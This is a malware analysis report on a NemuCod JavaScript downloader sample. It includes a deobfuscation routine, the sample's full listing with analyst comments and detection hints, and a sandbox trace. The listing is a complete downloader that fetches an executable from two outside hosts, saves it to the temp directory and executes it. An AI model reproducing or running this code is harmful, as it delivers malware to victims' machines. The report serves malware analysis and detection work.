Title NemuCod
MD5 8f4e417afdb10c9d3d4b703c22009a60 (4544 bytes)
Submitted 2021-04-20 15:26:07
Started None
Completed 2021-04-20 15:26:18
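/**
 * String de-obfuscation routine recovered from the sample.
 *
 * Every string constant in the script is stored as Base64 text that was
 * XOR-ed with a fixed repeating key. This function reverses both layers:
 * Base64 -> byte string -> UTF-8 decode -> XOR with the key.
 *
 * The routine is pure string arithmetic (no COM, file or network access),
 * so an analyst can run it alone over the sample's constants to recover
 * indicators statically instead of detonating the whole script.
 *
 * Fix over the original listing: the UTF-8 helper assigned to undeclared
 * c1/c2/c3, which leaked globals and throws a ReferenceError in strict
 * mode / ES modules. They are now declared locally; output is unchanged.
 *
 * @param {string} packedText Obfuscated constant. Characters outside the
 *     Base64 alphabet (the sample wraps each value in literal double
 *     quotes) are stripped before decoding.
 * @returns {string} The de-obfuscated string.
 */
var decode = function (packedText) {
    // Hard-coded repeating XOR key. Useful as a static signature for
    // related samples, and required to decode any of the constants.
    var cipher ="NYTSNPfMN9Kk7sBU";

    var Base64 = {
        // Standard Base64 alphabet; index 64 ("=") marks padding.
        _keyStr: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",

        // Decodes Base64 text to a string, then interprets it as UTF-8.
        decode: function (input) {
            var output = "";
            var chr1, chr2, chr3;
            var enc1, enc2, enc3, enc4;
            var i = 0;

            // Drop everything that is not a Base64 character, including
            // the quote characters embedded in the sample's literals.
            input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");

            while (i < input.length) {
                // Four 6-bit symbols are repacked into three 8-bit values.
                enc1 = this._keyStr.indexOf(input.charAt(i++));
                enc2 = this._keyStr.indexOf(input.charAt(i++));
                enc3 = this._keyStr.indexOf(input.charAt(i++));
                enc4 = this._keyStr.indexOf(input.charAt(i++));

                chr1 = (enc1 << 2) | (enc2 >> 4);
                chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
                chr3 = ((enc3 & 3) << 6) | enc4;

                output = output + String.fromCharCode(chr1);

                // Padding symbols produce no output byte.
                if (enc3 !== 64) {
                    output = output + String.fromCharCode(chr2);
                }
                if (enc4 !== 64) {
                    output = output + String.fromCharCode(chr3);
                }
            }

            return Base64._utf8_decode(output);
        },

        // Collapses 1-, 2- and 3-byte UTF-8 sequences into UTF-16 code
        // units. Any lead byte that is not < 128 or in 192..223 is
        // treated as a 3-byte sequence, exactly as in the original.
        _utf8_decode: function (utftext) {
            var string = "";
            var i = 0;
            var c = 0;
            var c2 = 0;
            var c3 = 0;

            while (i < utftext.length) {
                c = utftext.charCodeAt(i);

                if (c < 128) {
                    string += String.fromCharCode(c);
                    i++;
                }
                else if ((c > 191) && (c < 224)) {
                    c2 = utftext.charCodeAt(i + 1);
                    string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
                    i += 2;
                }
                else {
                    c2 = utftext.charCodeAt(i + 1);
                    c3 = utftext.charCodeAt(i + 2);
                    string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
                    i += 3;
                }
            }
            return string;
        }
    };

    var text = Base64.decode(packedText);

    // Second layer: XOR each character with the key, repeating the key
    // as often as needed.
    var cipherLength = cipher.length;
    var result = "";
    for (var i = 0; i < text.length; i++) {
        result += String.fromCharCode(text.charCodeAt(i) ^ cipher.charCodeAt(i % cipherLength));
    }
    return result;
};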
// Analyst notes: downloader stage of the sample, run under Windows Script
// Host (it calls WScript.CreateObject). It tries each URL in a list,
// keeps the first HTTP 200 response larger than a size threshold, writes it
// to the temp directory and then launches it. Identifier names are the
// sample's own (randomised) names and are left untouched so the listing
// still matches the submitted file. Decoded values below were obtained by
// applying decode() (defined earlier in this file) to each constant and
// agree with the sandbox trace that follows the listing.
(function() {
    // HTTP status the script requires before it keeps a response.
    var refectoryVSk = 200;
    // Decodes to "GET": the HTTP verb passed to open() below.
    var smatteringxHT = decode('"CRwA"');
    // Decodes to "Exec": the method name looked up on the shell object at the end.
    var machinationjUB = decode('"CyExMA=="');
    // ProgID of the first COM object created (WScript.Shell in the trace).
    var piquevXi = decode('"GQo3IScgEmMdUS4HWw=="');
    // ProgID of the second COM object created (MSXML2.XMLHTTP in the trace).
    var proprietyAcA = decode('"AwoMHgJiSBUDdQM/YyM="');
    // Decodes to "ADODB"; joined with "." and the next constant below.
    var canonRAY = decode('"Dx0bFww="');
    // Decodes to "Stream".
    var ominousLgO = decode('"HS0mNi89"');
    // Decodes to "%TEMP%\": environment-variable form of the drop directory.
    var encroachmentHPT = decode('"aw0RHh51Og=="');
    // Decodes to ".exe": extension appended to the dropped file name.
    var consecrateVOe = decode('"YDwsNg=="');
    // Minimum response size (200000 bytes) before a download is accepted;
    // presumably filters out error or placeholder pages (not confirmed here).
    var purportGtS = 2e5;
    // Candidate download URLs, tried in order; the decoded values are the
    // two GET targets listed in the sandbox trace.
    var propitiateWPS = [ decode('"Ji0gI3R/SSUrVScEQBwwOSooJSJgMwkgYQp/RVILJw=="'), decode('"Ji0gI3R/STo6XyIYUBwrOykxMSErNgBjLVYmRARHbDA2PA=="') ];
    // Numeric base name of the dropped file (524288 == 2^19).
    var exegesispv5 = 524288;
    // Shell object: used for environment expansion and process launch.
    var jetb0x = WScript.CreateObject(piquevXi);
    // HTTP client object.
    var repineEaK = WScript.CreateObject(proprietyAcA);
    // The ProgID "ADODB.Stream" is assembled from three pieces at run time,
    // so the full string never appears in the file, even after a single
    // decode of any one constant.
    var arbitratedQk = WScript.CreateObject(canonRAY + decode('"YA=="') + ominousLgO);
    // Resolved temp directory for the current user.
    var specioushfk = jetb0x.ExpandEnvironmentStrings(encroachmentHPT);
    // Drop path: <temp dir> + 524288 + ".exe". A fixed file-name indicator
    // for host-based detection.
    var caucusDtL = specioushfk + exegesispv5 + consecrateVOe;
    // Set to true once a payload has been written to disk.
    var connotationXul = false;
    for (var sinuouss6G = 0; sinuouss6G < propitiateWPS.length; sinuouss6G++) {
        try {
            var courtdRd = propitiateWPS[sinuouss6G];
            // Third argument false = synchronous request; send() blocks
            // until the response is complete.
            repineEaK.open(smatteringxHT, courtdRd, false);
            repineEaK.send();
            if (repineEaK.status == refectoryVSk) {
                try {
                    arbitratedQk.open();
                    // Stream type 1 = binary (adTypeBinary).
                    arbitratedQk.type = 1;
                    arbitratedQk.write(repineEaK.responseBody);
                    // Only responses above the size threshold are saved.
                    if (arbitratedQk.size > purportGtS) {
                        // Forces the loop to end after this iteration, so
                        // later URLs are fallbacks only.
                        sinuouss6G = propitiateWPS.length;
                        arbitratedQk.position = 0;
                        // Option 2 = overwrite an existing file
                        // (adSaveCreateOverWrite).
                        arbitratedQk.saveToFile(caucusDtL, 2);
                        connotationXul = true;
                    }
                } finally {
                    // The stream is closed on every attempt, so the same
                    // object can be reopened for the next URL.
                    arbitratedQk.close();
                }
            }
        // Any failure (DNS, HTTP, file write) is swallowed without logging,
        // and the loop moves on to the next URL.
        } catch (ignored) {}
    }
    if (connotationXul) {
        // Launch step: resolves to jetb0x.Exec(<temp dir> + 524288). The
        // argument is rebuilt with Math.pow(2, 19) and omits the ".exe"
        // suffix used for the saved path; presumably Windows resolves the
        // extension at process creation (confirm in process telemetry).
        // Detection hint: a script-host process fetching a binary over HTTP,
        // writing an executable to the temp directory and spawning it.
        jetb0x[machinationjUB](specioushfk + Math.pow(2, 19));
    }
})();
[CREATE] WScript.Shell
[CREATE] MSXML2.XMLHTTP
[CREATE] ADODB.Stream
[NET] GET http://helloworldqqq.com/34.exe
[WRITE] {Data received from http://helloworldqqq.com/34.exe}
[NET] GET http://wtfisgoinghereff.com/34.exe
[WRITE] {Data received from http://wtfisgoinghereff.com/34.exe}